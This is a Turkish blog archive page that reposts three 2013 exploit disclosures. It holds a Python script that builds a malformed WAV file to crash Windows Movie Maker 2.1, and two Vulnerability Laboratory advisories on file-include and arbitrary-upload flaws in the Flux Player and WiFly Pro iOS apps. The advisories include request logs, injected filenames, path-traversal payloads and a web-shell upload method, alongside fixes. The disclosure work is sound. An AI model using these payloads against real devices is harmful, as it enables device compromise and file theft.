Archive for 21 Temmuz 2013

Windows Movie Maker Version 2.1.4026.0 (.wav) – Crash POC

Windows Movie Maker Version 2.1.4026.0 (.wav) – Crash POC Exp

# Exploit Title: Windows Movie Maker Version 2.1.4026.0 (.wav) - Crash POC
# Date: 16-07-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.microsoft.com
# Software Link: included in windows xp sp2 and sp3
# Version: 2.1.4026.0
# Tested on: [ Windows XP sp3]
# CVE : 2013-4858
#============================================================================================
# Open Windows movie maker in left panel click on "Import audio or music" and choose movieMaker.wav
#  
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

filename = "movieMaker.wav"
file = open(filename , "w")
file.write(string)
file.close()

Flux Player v3.1.0 iOS – Multiple Vulnerabilities

Flux Player v3.1.0 iOS – Genel Açıkları bulunmuş olup Açık hakkında Açık bulucunun açıklamaları ve yorumları aşağıdaki gibidir.

Title:
======
Flux Player v3.1.0 iOS - File Include & Arbitrary File Upload Vulnerability



Date:
=====
2013-07-16


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1013


VL-ID:
=====
1013


Common Vulnerability Scoring System:
====================================
7.5


Introduction:
=============
With `Flux Player` you can use your iPhone, iPad or iPod touch for download, transfer and playback of movies, 
audio books and music. The movies may be from transferred from commercial services, products or alternatively 
from yourself by drag-and-drop with the free `Flux Transfer` PC application.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/flux-player/id324300572 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a file include & arbitrary file upload vulnerability in the Flux Player 3.1.0 (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-07-16:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Flux Player - Application 3.1.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A file include web vulnerability is detected in the Flux Player 3.1.0 Application (Apple iOS - iPad & iPhone).
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.

The vulnerability is located in the upload module when processing to upload files with manipulated names via POST method. The attacker can inject 
local path or files to request context and compromise the device. The validation has a bad side effect which impacts the risk to combine the attack 
with persistent injected script code.

Exploitation of the vulnerability requires no user interaction or privilege flux player application user account. Successful exploitation of the 
vulnerability results in unauthorized local file and path requests to compromise the device or application.

Vulnerable Module(s):
				[+] Upload (Files)

Vulnerable Parameter(s):
				[+] filename 

Affected Module(s):
				[+] Index File Dir Listing



1.2
An arbitrary file upload web vulnerability is detected in the Flux Player 3.1.0 Application (Apple iOS - iPad & iPhone).
The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.

The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload 
a php or js web-shells by renaming the file with multiple extensions. He uploads for example a web-shell with the following name and 
extension picture.jpg.js.php.jpg . He deletes in the request after the upload the jpg to access unauthorized the malicious file (web-shell) to 
compromise the web-server or mobile device.

Exploitation of the vulnerability requires no user interaction or privilege flux player application user account. Successful exploitation of the 
vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.

Vulnerable Module(s):
				[+] Upload (Files)

Vulnerable Parameter(s):
				[+] filename (multiple extensions)

Affected Module(s):
				[+] Index File Dir Listing


Proof of Concept:
=================
The local file include and arbitary file upload vulnerability can be exploited by remote attackers without privilege application 
user account and also without user interaction. For demonstration or reproduce ...


1.1
--- Request Session Log 1 - Local File Include ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] Mime 

Type[application/x-unknown-content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept
     
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
     DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Post Data:
      POST_DATA[-----------------------------21961286324572
Content-Disposition: form-data; name="file"; filename=<iframe src=a>"<iframe src=var/app/Mobile>"
Content-Type: image/png
-
--
Status: 200[OK]

GET http://localhost:8080/../var/app/Mobile > [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime Type[application/x-unknown-

content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept 
      
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Response Headers:
      Accept-Ranges[bytes]
      Content-Length[669]
      Date[Mo., 15 Jul 2013 20:05:02 GMT]



1.2
--- Request Session Log 2 - Arbitrary File Upload ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] Mime 

Type[application/x-unknown-content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept
     
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
     DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Post Data:
      POST_DATA[-----------------------------21961286324572
Content-Disposition: form-data; name="file"; filename="schoko-drops-337.gif.html.php.js.jpg"
Content-Type: image/png
---
Status: 200[OK]

GET http://localhost:8080/schoko-drops-337.gif.html.php.js.jpg > [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime Type[application/x-unknown-

content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept 
      
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Response Headers:
      Accept-Ranges[bytes]
      Content-Length[669]
      Date[Mo., 15 Jul 2013 20:05:05 GMT]




Note: 
After the upload of the manipulated malicious file (shell or web-shell), the remote attacker is able to access the 
full files by a delete of the image file extension. Its also possible to upload a file with multiple file extensions 
and to access with another frame.



PoC:

<html><head><title>Download</title><style>html {background-color:#eeeeee} body 
{ background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-

size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head>
<body><h1>Files from </h1><bq>The following files are hosted 

live from the <strong>iPhone's</strong> Docs folder.</bq><p><a href="..">..</a><br>
<a href=".DownloadStatus">.DownloadStatus</a>		(     0.0 Kb, (null))<br>
<a href=".mpdrm">.mpdrm</a>		(     0.0 Kb, (null))<br>
<a href="<iframe src=a>">_<[File Include/Arbitrary File Upload Vulnerability!]"></a>(0.0 Kb, (null))<br />
<a href=">">BKM337></a>		(     0.0 Kb, (null))<br />
<a href="Rem0ve>">Rem0ve></a>		(     0.0 Kb, (null))<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>		(     0.0 Kb, (null))<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file
<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" 
value="Submit" /></label></form></body></html></iframe></a></p></body></html>

Note: 
To exploit the issue the attacker needs to bypass the validation by an inject of 2 different scripts (tags).
After the upload the local file or path gets executed when processing to open the item listing.


Solution:
=========
1.1
The vulnerability can be patched by a secure parse of the filenames when processing to upload via POST method request.
Encode and parse the filename output listing in the index site of the application. Restrict the filename name input and disallow special chars.

1.2
Restrict the input of the filenames when processing to upload a file with multiple extension. 
Encode and parse the filename output listing in the index site of the application. Restrict the filename name input and disallow special chars.
Disallow to open urls with multiple file extensions to prevent execution or access to web-shells.



Risk:
=====
1.1
The security risk of the local file include web vulnerability is estimated as high.

1.2
The security risk of the arbitrary file upload vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


WiFly 1.0 Pro iOS – Multiple Web Vulnerabilities

WiFly 1.0 Pro iOS – Multiple Web açıkları bulunmuş olup açığın kullanımı hakkında yorumlar aşağıdaki şekilde bulunmaktadır.

Title:
======
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities


Date:
=====
2013-07-15


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1011


VL-ID:
=====
1011


Common Vulnerability Scoring System:
====================================
6.3


Introduction:
=============
It is the best solution for transferring photos, songs, documents, movies and other files between computer 
and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR 
code from http://wifly.me to connect your phone. Drop your files into opened page and vice versa!
No cloud or internet access required - no data leaves your local network. Both your devices must have access 
to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with 
any supported App on your iOS device.

Capabilities:

- Multiple uploads

- Easily Drag & Drop multiple files to WiFly

- Preview pictures in the browser
- Downloading the entire folder to your computer

- Browsing files and folders directly on mobile device

- Exchange files between mobile devices
- Built in preview of images, documents, music and video files

(Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-07-15:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: WiFly Pro 1.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A local file include and arbitrary file upload web vulnerability is detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

The vulnerabilities are located in the file upload module of the web-server (http://localhost:4885/) when processing 
to request via POST a manipulated filename. The injected file will be accessable via the index listing module of the application.  

Remote attackers can exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. 
After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php, js, html codes.

The filter in the application itself disallow to rename a file with special chars because of a input field restriction. Attackers need to request 
2 different urls. First the file as url with a parameter of the filename inside to display and as secound step the file will be uploaded with 
the manipulated filename in the POST request.

Exploitation of the vulnerability requires no user interaction but the victim iOS device needs to accept the other device connection.
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
				[+] WiFly Pro 1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] Upload

Vulnerable File(s):
				[+] upload.json & add

Vulnerable Parameter(s):
				[+] filename

Affected Module(s):
				[+] Index Listing (http://localhost:4885/)


Proof of Concept:
=================
The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction 
but the connection needs to be accepted by the target system. For demonstration or reproduce ...

Standard Request:
Content-Disposition: form-data; name="files[]"; filename="s2.png"\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n

Status: 200 
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109 
Load Flags[LOAD_BYPASS_CACHE  ] Content Size[118] Mime Type[application/x-unknown-content-type]
   


PoC: 1.1 - File/Path Include Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&
last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109 
POST_DATA[-----------------------------27213192708057
Content-Disposition: form-data; name="files[]"; filename="../../[File/Path Include Vulnerability!]"
Content-Type: image/png


PoC: 1.2 - Arbitrary File Upload Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&
last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109 
POST_DATA[-----------------------------27213192708057
Content-Disposition: form-data; name="files[]"; filename="[Arbitrary File Upload Vulnerability!].png.gif.html.php.js"
Content-Type: image/png


Solution:
=========
The vulnerability can be patched by a restriction of the json upload request and url parameter.
The POST request when processing to upload needs to be restricted, encoded and filtered.


Risk:
=====
The security risk of the local file/path include & arbitrary file upload vulnerability is estimated as high.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]







-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com